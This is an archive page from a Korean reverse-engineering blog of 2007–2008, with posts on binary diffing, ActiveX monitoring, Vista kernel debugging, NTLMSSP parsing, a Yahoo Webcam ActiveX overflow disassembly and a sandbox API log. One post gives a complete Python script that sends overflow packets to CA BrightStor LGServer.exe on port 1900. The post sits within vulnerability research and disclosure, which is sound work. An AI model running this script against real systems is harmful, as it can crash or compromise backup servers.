'리버스 엔지니어링'에 해당되는 글 10건
- 2008/05/22 바이너리 디핑 도구: 다른 그림을 사용한 리서치
- 2008/03/11 ActiveX 모니터링툴
- 2008/01/21 파쇄문서 이어 붙이기
- 2007/10/29 Windows Vista Kernel Remote Debugging 팁들(Tips)
- 2007/10/24 인터넷 개인 정보 뒷조사 도구-말티고(Maltego)
- 2007/10/22 Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops
- 2007/10/11 Basic NTLMSSP Parsing SchemeLMO TypeNTLMSSP Message
- 2007/09/25 Yahoo! Webcam ActiveX 취약점에 대한 디스어셈블리
- 2007/09/25 Norman Sandbox AnalyzerStartupSetting Filename and optionsStartCompletedResults (1)
- 2007/09/25 MS 06-074에 대한 Diffing Result
Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications 에서 마이크로 소프트 패치를 분석하기 위하여 다른 그림을 사용했습니다.
We can use off-the-shelf tools to identify the vulnerability point and the added checks. In our implementation, we use EBDS [13], a tool that automatically compares two executables and reports the differences.
태터데스크 관리자
태터데스크 메시지
'리버스 엔지니어링' 카테고리의 다른 글
| 바이너리 디핑 도구: 다른 그림을 사용한 리서치 (0) | 2008/05/22 |
|---|---|
| ActiveX 모니터링툴 (0) | 2008/03/11 |
| 파쇄문서 이어 붙이기 (0) | 2008/01/21 |
| Windows Vista Kernel Remote Debugging 팁들(Tips) (0) | 2007/10/29 |
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
COMSpy라고 ActiveX 취약점을 계속 연구하던 한 연구자가 나에게 알려 준 툴이 있다. 물론 그 당시 이미 COM 관련 DLL을 후킹하여 메쏘드와 인자들을 모니터링하는 방법을 이미 알고 있었지만 “proprietary code”이다.
COMSpy는 오픈소스로서 COM 내부가 어떻게 돌아 가는지, 후킹은 어떻게 하는지 조금 오래되고(마지막 업데이트가 99년) 복잡한 방법을 사용하기는 하지만 좋은 방향을 제시해 준다. 레지스트리를 수정해서 자기 자신의 dll을 후킹하려는 인터페이스에 등록해 놓고 프록싱을 하는 고전적인 방식의 후킹을 사용하고 있다.
태터데스크 관리자
태터데스크 메시지
'리버스 엔지니어링' 카테고리의 다른 글
| 바이너리 디핑 도구: 다른 그림을 사용한 리서치 (0) | 2008/05/22 |
|---|---|
| ActiveX 모니터링툴 (0) | 2008/03/11 |
| 파쇄문서 이어 붙이기 (0) | 2008/01/21 |
| Windows Vista Kernel Remote Debugging 팁들(Tips) (0) | 2007/10/29 |
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
종이책 WIRED를 읽다가 발견한 흥미로운 기사입니다. 웹에도 올라 와 있더군요.
How the CIA Used a Fake Sci-Fi Flick to Rescue Americans from Tehran
80년대 이란 사태(?) 때에 대사관 직원들의 위장 탈출을 다룬 글인데, 무슨 영화를 만들어도 될 내용이군요. 그런데 내용을 읽다가 정말 재미 있는 내용 하나를 발견했습니다.
They had even hired teams of carpet weavers to successfully reassemble shredded documents. (The recovered papers would later be published by the Iranian government in a series of books called Documents From the US Espionage Den.)
이란 정부에서는 이때에 버려진 미국 대사관에서 입수한 파쇄된 문서를 카펫 직공들을 고용해다가이어 붙였다는 군요.
궁금해서 찾아 보니 진짜더군요.
다음 문서 73에서 76페이지를 보면 문서 파쇄기로 파쇄한 것을 정교하게 이어 붙였습니다.
직공들의 대단한 노고에 찬사를 보냅니다.
http://www.thememoryhole.org/espionage_den/espionage_den01.pdf
'리버스 엔지니어링' 카테고리의 다른 글
| 바이너리 디핑 도구: 다른 그림을 사용한 리서치 (0) | 2008/05/22 |
|---|---|
| ActiveX 모니터링툴 (0) | 2008/03/11 |
| 파쇄문서 이어 붙이기 (0) | 2008/01/21 |
| Windows Vista Kernel Remote Debugging 팁들(Tips) (0) | 2007/10/29 |
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
하지만 몇달전 Vista에서 드라이버 개발을 처음 시작할 때에 가장 황당했던 것이 리모트 디버깅의 세팅이었다. 간단하게 boot.ini에서 다음 스트링을 추가해 주면 되었던 것이 복잡한 명령어들을 사용하도록 바뀐 것이다.
/debugport=com1 /baudrate=115200
간단한 구글링을 통해서 Debugging Windows Vista라는 문서를 찾았고, 사실 문서 내용이 장황하지만, 간단하게 다음 예제처럼 따라 하면 금방 원하는 디버깅이 활성화된 부트 엔트리를 생성할 수 있다.
C:\Windows\system32>bcdedit /copy {current} /d DebugEntry
The entry was successfully copied to {919494ed-866b-11dc-bcb1-000c294d72db}.
C:\Windows\system32>bcdedit /debug {919494ed-866b-11dc-bcb1-000c294d72db} ON
The operation completed successfully.
C:\Windows\system32>bcdedit /default {919494ed-866b-11dc-bcb1-000c294d72db}
The operation completed successfully.
물론 중간의 {} 사이의 랜덤 문자열은 때에 따라서 변하므로 주의해야 한다.
또 한가지 windbg의 명령행에서 Lord Of Ring0: Driver Debugging with WinDbg and VMWare의 예제는 resets=0를 지정하여 사용하지만, Vista의 경우에는 어떠한 이유에서인지 해당 값을 1로 세팅해서 사용해야만 했다.
"C:\Program Files\Debugging Tools for Windows\windbg" -b -k com:pipe,port=\\.\pipe\com_1,resets=1
이제 Vista에서 커널을 후빌 수 있는 만반의 준비가 된것이다.
'리버스 엔지니어링' 카테고리의 다른 글
| ActiveX 모니터링툴 (0) | 2008/03/11 |
|---|---|
| 파쇄문서 이어 붙이기 (0) | 2008/01/21 |
| Windows Vista Kernel Remote Debugging 팁들(Tips) (0) | 2007/10/29 |
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
| Basic NTLMSSP Parsing SchemeLMO TypeNTLMSSP Message (0) | 2007/10/11 |
2007년 블랙햇에서 잠시 소개 되었던 Paterva라는 툴이 Maltego라는 이름으로 다시 나왔다.GUI와 웹인터페이스 버전이 존재하는데 GUI는 다음과 같은 모습을 띄고 있다.하지만 현제 GUI 버전은 잠시 중지 된 듯하다.
잠시 사용해 보니 검색 기능이 너무 강력하다 못해 위험한 수준이다. 오용되면 상당한 문제를 일으킬 만한 툴이다.
http://www.paterva.com/web/Maltego/
'리버스 엔지니어링' 카테고리의 다른 글
| 파쇄문서 이어 붙이기 (0) | 2008/01/21 |
|---|---|
| Windows Vista Kernel Remote Debugging 팁들(Tips) (0) | 2007/10/29 |
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
| Basic NTLMSSP Parsing SchemeLMO TypeNTLMSSP Message (0) | 2007/10/11 |
| Yahoo! Webcam ActiveX 취약점에 대한 디스어셈블리 (0) | 2007/09/25 |
Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops
아주 오래전 우연히 발견한 버그...
http://research.eeye.com/html/advisories/published/AD20070920.html
거의 일년이 다되어서 포스팅 된듯하다.
간단히 퍼저를 만들어 보자면 다음과 같다.
#CA BrightStor LGServer.exe Fuzzer
import os
import sys
import socket
import re
import time
def MakeCommandStr(command,arguments):
body=command
for argument in arguments:
body+="~~"+str(argument)
return "%.10d"%len(body)+body
def FuzzyCommand(target,command_info):
debug=2
sockAddr = (target, 1900)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.settimeout(3)
tsock.connect(sockAddr)
packets=[]
packets.append(MakeCommandStr(command_info[0],["A"*3000]))
for packet in packets:
if debug>0:
print "="*80
print "Sending: ",packet
tsock.send(packet)
response = tsock.recv(1024)
if debug>0:
print "Got: ",response
print "\n\n"
tsock.close()
def SendRXRequests(target,method='Passwd Integer Overflow',Command="",argument_list=None):
sockAddr = (target, 1900)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.settimeout(10)
tsock.connect(sockAddr)
packets=[]
if method=='Login Overflow':
passwd_str="7631F40AA4F38B3007EBA24153F08EDB02"
packets.append(MakeCommandStr("rxrLogin",["administrator"+"A"*1000,len(passwd_str)]))
packets.append(passwd_str)
elif method=='Passwd Integer Overflow':
packets.append(MakeCommandStr("rxrLogin",["administrator","18"]))
packets.append("000000000000000000")
elif method=='Passwd Test':
passwd_str="7631F40AA4F38B3007EBA24153F08EDB02"
packets.append(MakeCommandStr("rxrLogin",["administrator",str(len(passwd_str))]))
packets.append(passwd_str)
elif method=='Passwd Stack Overflow':
passwd_str="A"*4*5000+"02"
packets.append(MakeCommandStr("rxrLogin",["administrator",str(len(passwd_str))]))
packets.append(passwd_str)
elif method=='Passwd Length Integer Overflow':
#Not working well
passwd_str="AAAA"
packets.append(MakeCommandStr("rxrLogin",["administrator",0xffffffff]))
packets.append(passwd_str)
elif method=='Fuzzying':
packets.append(MakeCommandStr(Command,argument_list))
for packet in packets:
print "="*80
print "Sending: ",packet
tsock.send(packet)
response = tsock.recv(1024)
print "Got: ",response
print "\n\n"
tsock.close()
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target>' % sys.argv[0]
sys.exit(-1)
Methods=[]
Methods.append(['Login Overflow','',[]])
Methods.append(['Passwd Stack Overflow','',[]])
Methods.append(['Passwd Integer Overflow','',[]])
#Methods.append(['Passwd Length Integer Overflow','',[]])
Methods.append(['Fuzzying',"rxsClearPassword",["A"*3000]])
Methods.append(['Fuzzying',"rxsSetActive",["A"*3000]])
Methods.append(['Fuzzying',"rxsRenameUser",["A"*3000,"A"*3000]])
Methods.append(['Fuzzying',"rxsDeleteUser",["A"*3000]])
Methods.append(['Fuzzying',"rxsSetProtected",["A"*3000,"A"*3000]])
Methods.append(['Fuzzying',"rxsSetupRestoreUser",["A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000]])
Methods.append(['Fuzzying',"rxsDeleteFile",["A"*3000]])
Methods.append(['Fuzzying',"rxcReadBackupSetList",["A"*3000]])
Methods.append(['Fuzzying',"rxcCriticalSection",["A"*3000]])
Methods.append(['Fuzzying',"rxsGetUserInfo",["A"*3000]])
while 1:
number=0
print '='*50
print 'BrightStor ARCserve Backup for Laptops and Desktops Killer:'
print 'CA BrightStor LGServer.exe Fuzzer'
print ''
for [type,func,arg] in Methods:
number+=1
print number,type,func
print ''
print 0,'Exit'
print ''
print ''
method_number=input("Which method do you want?")
try:
print int(method_number)
if method_number==0:
break
SendRXRequests(
target,
method=Methods[method_number-1][0],
Command=Methods[method_number-1][1],
argument_list=Methods[method_number-1][2])
except:
pass
'리버스 엔지니어링' 카테고리의 다른 글
| Windows Vista Kernel Remote Debugging 팁들(Tips) (0) | 2007/10/29 |
|---|---|
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
| Basic NTLMSSP Parsing SchemeLMO TypeNTLMSSP Message (0) | 2007/10/11 |
| Yahoo! Webcam ActiveX 취약점에 대한 디스어셈블리 (0) | 2007/09/25 |
| Norman Sandbox AnalyzerStartupSetting Filename and optionsStartCompletedResults (1) | 2007/09/25 |
Basic NTLMSSP Parsing Scheme
LMO Type
|
Field Name |
Length |
Value |
|
Length |
USHORT |
Length of the message |
|
Maxlen |
USHORT |
Maximum length of the message |
|
Offset |
DWORD |
Offset of the start of the message |
NTLMSSP Message
|
Field Name |
Length |
Value |
|
NTLMSSP identifier |
Fixed: 8 |
Ascii "NTLMSSP"+0x0 |
|
NTLM message Type |
DWORD |
|
|
Lan Manager Response |
LMO Type |
Binary |
|
NTLM Response |
LMO Type |
Binary |
|
Domain name |
LMO Type |
Unicode w/o NULL termination |
|
User name |
LMO Type |
Unicode w/o NULL termination |
|
Host name |
LMO Type |
Unicode w/o NULL termination |
|
Session Key |
8 Bytes |
|
|
Flags |
DWORD |
|
'리버스 엔지니어링' 카테고리의 다른 글
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
|---|---|
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
| Basic NTLMSSP Parsing SchemeLMO TypeNTLMSSP Message (0) | 2007/10/11 |
| Yahoo! Webcam ActiveX 취약점에 대한 디스어셈블리 (0) | 2007/09/25 |
| Norman Sandbox AnalyzerStartupSetting Filename and optionsStartCompletedResults (1) | 2007/09/25 |
| MS 06-074에 대한 Diffing Result (0) | 2007/09/25 |
Yahoo! Webcam ActiveX 취약점에 대한 디스어셈블리.
다음 링크에서 소개되고 있는 취약점에 대한 개인적인 disassembly입니다.
http://research.eeye.com/html/alerts/zeroday/20070606.html
call strcpy를 하는 부분에서 버퍼 오버플로우가 발생하게 됩니다.. 이 루틴의 여러 종류의 COM 메쏘드를 통해서 불리울 수 있다.
exploit은 http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0131.html과 http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0133.html 참조하기를 바랍니다.
Disassembling
ywcvwr
02700000 02723000 ywcvwr C (export symbols) ywcvwr.dll
.text:03971000 ; Input MD5 : 75BB9620F65D004B02331B6EE87DEEA7
.text:03971000
.text:03971000 ; File Name : C:\Program Files\Yahoo!\Messenger\ywcvwr.dll
.text:03971000 ; Format : Portable executable for 80386 (PE)
.text:03971000 ; Imagebase : 10000000
.text:03971000 ; Section 1. (virtual address 00001000)
.text:03971000 ; Virtual size : 00015356 ( 86870.)
.text:03971000 ; Section size in file : 00016000 ( 90112.)
.text:03971000 ; Offset to raw data for section: 00001000
.text:03971000 ; Flags 60000020: Text Executable Readable
.text:03971000 ; Alignment : default
.text:03971000 ; OS type : MS Windows
.text:03971000 ; Application type: DLL 32bit
.text:03971000
Base in File: 03971000
Loaded: 02700000
Point of Interest: 027067bc
-02700000=67bc
03971000+67bc=39777BC- 00001000= 39767BC
.text:039767A2 push eax ; char *
.text:039767A3 push 3FFh ; cbData
.text:039767A8 lea eax, [ebp-434h]
.text:039767AE push eax ; lpData
.text:039767AF push offset ValueName ; "WebcamServer"
.text:039767B4 lea ecx, [ebp-34h]
.text:039767B7 call sub_39731E9
.text:039767BC mov eax, [esi+2FCh]
0397676B
.text:0397676B or dword ptr [ebp-4], 0FFFFFFFFh
.text:0397676F test eax, eax
.text:03976771 mov [esi+2FCh], eax
.text:03976777 jz loc_3976867
.text:0397677D push 80000001h
.text:03976782 push offset aSoftwareYahooP ; "Software\\Yahoo\\Pager\\"
.text:03976787 lea ecx, [ebp-34h]
.text:0397678A call sub_397324C
.text:0397678F lea ecx, [esi+220h]
.text:03976795 mov dword ptr [ebp-4], 1
.text:0397679C call ds:?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::c_str(void)
call sub_39731E9
.text:039767A2 push eax ; char *
.text:039767A3 push 3FFh ; cbData
.text:039767A8 lea eax, [ebp-434h]
.text:039767AE push eax ; lpData
.text:039767AF push offset ValueName ; "WebcamServer"
.text:039767B4 lea ecx, [ebp-34h]
.text:039767B7 call sub_39731E9
.text:039767BC mov eax, [esi+2FCh]
.text:039767C2 mov ebx, [eax]
call sub_39731E9
.text:0397C913 push 80000001h
.text:0397C918 push offset aSoftwareYahooP ; "Software\\Yahoo\\Pager\\"
.text:0397C91D lea ecx, [ebp-30h]
.text:0397C920 call sub_397324C
.text:0397C925 push offset aWebcam_yahoo_c ; "webcam.yahoo.com"
.text:0397C92A push 63h ; cbData
.text:0397C92C lea eax, [ebp-94h]
.text:0397C932 push eax ; lpData
.text:0397C933 push offset ValueName ; "WebcamServer"
.text:0397C938 lea ecx, [ebp-30h]
.text:0397C93B mov byte ptr [ebp-4], 11h
0397C93F call sub_39731E9
sub_39731E9
.text:039731E9 ; int __stdcall sub_39731E9(LPCSTR lpValueName,char *lpData,DWORD cbData,char *)
.text:039731E9 sub_39731E9 proc near ; CODE XREF: sub_397671E+99#p
.text:039731E9 ; sub_397C7C5+17A#p
.text:039731E9
.text:039731E9 Type= dword ptr -8
.text:039731E9 hKey= dword ptr -4
.text:039731E9 lpValueName= dword ptr 8
.text:039731E9 lpData= dword ptr 0Ch
.text:039731E9 cbData= dword ptr 10h
.text:039731E9 arg_C= dword ptr 14h
.text:039731E9
.text:039731E9 push ebp
.text:039731EA mov ebp, esp
.text:039731EC push ecx
.text:039731ED push ecx
.text:039731EE and [ebp+Type], 0
.text:039731F2 push esi
.text:039731F3 mov esi, ecx
.text:039731F5 lea eax, [ebp+hKey]
.text:039731F8 push eax ; phkResult
.text:039731F9 lea ecx, [esi+4]
.text:039731FC call ds:?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::c_str(void)
.text:03973202 push eax ; lpSubKey
.text:03973203 push dword ptr [esi] ; hKey
.text:03973205 call ds:RegOpenKeyA
.text:0397320B test eax, eax
.text:0397320D pop esi
.text:0397320E jnz short loc_3973232
.text:03973210 lea eax, [ebp+cbData]
.text:03973213 push eax ; lpcbData
.text:03973214 push [ebp+lpData] ; lpData
.text:03973217 lea eax, [ebp+Type]
.text:0397321A push eax ; lpType
.text:0397321B push 0 ; lpReserved
.text:0397321D push [ebp+lpValueName] ; lpValueName
.text:03973220 push [ebp+hKey] ; hKey
.text:03973223 call ds:RegQueryValueExA
.text:03973229 push [ebp+hKey] ; hKey
.text:0397322C call ds:RegCloseKey
.text:03973232
.text:03973232 loc_3973232: ; CODE XREF: sub_39731E9+25#j
.text:03973232 cmp [ebp+Type], 1
.text:03973236 jz short loc_3973245
call strcpy
.text:03973238 push [ebp+arg_C] ; char *
.text:0397323B push [ebp+lpData] ; char *
.text:0397323E call strcpy
.text:03973243 pop ecx
.text:03973244 pop ecx
.text:03973245
.text:03973245 loc_3973245: ; CODE XREF: sub_39731E9+4D#j
.text:03973245 mov eax, [ebp+lpData]
.text:03973248 leave
.text:03973249 retn 10h
.text:03973249 sub_39731E9 endp
'리버스 엔지니어링' 카테고리의 다른 글
| 인터넷 개인 정보 뒷조사 도구-말티고(Maltego) (0) | 2007/10/24 |
|---|---|
| Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops (0) | 2007/10/22 |
| Basic NTLMSSP Parsing SchemeLMO TypeNTLMSSP Message (0) | 2007/10/11 |
| Yahoo! Webcam ActiveX 취약점에 대한 디스어셈블리 (0) | 2007/09/25 |
| Norman Sandbox AnalyzerStartupSetting Filename and optionsStartCompletedResults (1) | 2007/09/25 |
| MS 06-074에 대한 Diffing Result (0) | 2007/09/25 |
Norman Sandbox AnalyzerStartupSetting Filename and optionsStartCompletedResults
Example Session
Startup
Setting Filename and options
Start
Completed
Results
SandBox Summary
Using profile C:\Program Files\Norman SandBox Analyzer\Profiles\default.ini
E:\mat\Files\regscan.ex_ : OK
====> Sandbox output:
[ DetectionInfo ]
* Sandbox name:
* Signature name: NOT_SCANNED
[ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* File length: 334848 bytes.
* MD5 hash: f3387d5351199ad06173bafbe52165d3.
Files checked : 1
Unpacked file saved to: C:\Program Files\Norman SandBox Analyzer\files\Unpacked\regscan.unp
API Log
Stripped RealMode Disk Operating System (DOS) 2.00
(C) Norman ASA 2001
Starting Windows kernel.
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004091 accessing page 0x00050001
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004091 accessing page 0x00050002
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004091 accessing page 0x00050003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004091 accessing page 0x00050004
Installing driver : "VMM ", DDB at 0x0xC0005908
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031C00 accessing page 0x000C0006
Installing driver : "IFSMgr ", DDB at 0x0xC0005B66
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031C00 accessing page 0x000C0007
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031C00 accessing page 0x000C0008
Installing driver : "VWIN32 ", DDB at 0x0xC00067C8
Installing driver : "VFAT ", DDB at 0x0xC0008217
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031DF3 accessing page 0x00077BC0
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031DF3 accessing page 0x00077BC1
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031E2E accessing page 0x00077BC2
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x00031E2E accessing page 0x00077BC3
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x77BC1C5B accessing page 0x000F0001
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002E37 accessing page 0x000C3005
0x77BC1C84=KERNEL32!WinExec ("C:\WINDOWS\SYSTEM32\KERNEL32.DLL",0x00031E98)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00035AB accessing page 0x00072001
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0008AC2 accessing page 0x00070000
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C800
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C801
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C802
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C803
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C804
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C805
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C806
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C807
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C808
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C809
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C80A
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C80B
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C80C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C80D
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C80E
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C80F
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C810
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C811
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C812
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C813
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C814
**PAGE FAULT: process 0x00000000 - cs:eip 0x002B:0x7C80F0B9 accessing page 0x00073000
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00035AB accessing page 0x00072002
0x7C8094E8=KERNEL32!LoadLibraryA ("C:\WINDOWS\SYSTEM32\NTDLL.DLL")
0x7C80431E=KERNEL32!GetModuleHandleA ("C:\WINDOWS\SYSTEM32\NTDLL.DLL")
0x7C8043B4=KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\NTDLL.DLL",0x00000000)
0x7C802B3B=KERNEL32!GetFileSize (0x00000020,0x00000000)
0x7C8043BF=KERNEL32!_lclose (0x00000020)
0x7C80292C=KERNEL32!CloseHandle (0x00000020)
0x7C8043CB=KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\NTDLL.DLL",0x00000000,0x00000000)
0x7C80335C=KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0008AC2 accessing page 0x00070001
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C900
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C901
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C902
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C903
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C904
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x0007C905
0x7C8037F2=KERNEL32!LoadLibraryA ("kernel32.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("kernel32.dll")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"_ExitThread")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"GetCurrentProcessId")
0x7C8031E7=KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
0x7C80366B=KERNEL32!GetProcAddress (0x7C900000,"CPlApplet")
0x7C803600=KERNEL32!LeaveCriticalSection (0x00000000)
0x7C8094F2=KERNEL32!LoadLibraryA ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL")
0x7C80431E=KERNEL32!GetModuleHandleA ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL")
0x7C8043B4=KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL",0x00000000)
0x7C802B3B=KERNEL32!GetFileSize (0x00000020,0x00000000)
0x7C8043BF=KERNEL32!_lclose (0x00000020)
0x7C80292C=KERNEL32!CloseHandle (0x00000020)
0x7C8043CB=KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\ADVAPI32.DLL",0x00000000,0x00000000)
0x7C80335C=KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0008AC2 accessing page 0x00070002
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC0
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC1
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC2
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC3
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC4
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC5
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC6
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077DC7
0x7C8037F2=KERNEL32!LoadLibraryA ("kernel32.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("kernel32.dll")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"ExpandEnvironmentStringsA")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"lstrcmp")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CreateHandle")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"lstrcpy")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"Sleep")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"CreateSystemHandle")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"FetchTrueHandle")
0x7C803831=KERNEL32!GetProcAddress (0x7C800000,"WinExec")
0x7C8037F2=KERNEL32!LoadLibraryA ("user32.dll")
0x7C80431E=KERNEL32!GetModuleHandleA ("user32.dll")
0x7C804360=KERNEL32!strcpy (0x04FFFAF6,"C:\WINDOWS\SYSTEM32")
0x7C80436B=KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
0x7C804374=KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","user32.dll")
0x7C8043B4=KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\user32.dll",0x00000000)
0x7C802B3B=KERNEL32!GetFileSize (0x00000020,0x00000000)
0x7C8043BF=KERNEL32!_lclose (0x00000020)
0x7C80292C=KERNEL32!CloseHandle (0x00000020)
0x7C8043CB=KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\user32.dll",0x00000000,0x00000000)
0x7C80335C=KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00035AB accessing page 0x00072003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0008AC2 accessing page 0x00070003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D30
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D31
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D32
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D33
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D34
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003151 accessing page 0x00077D35
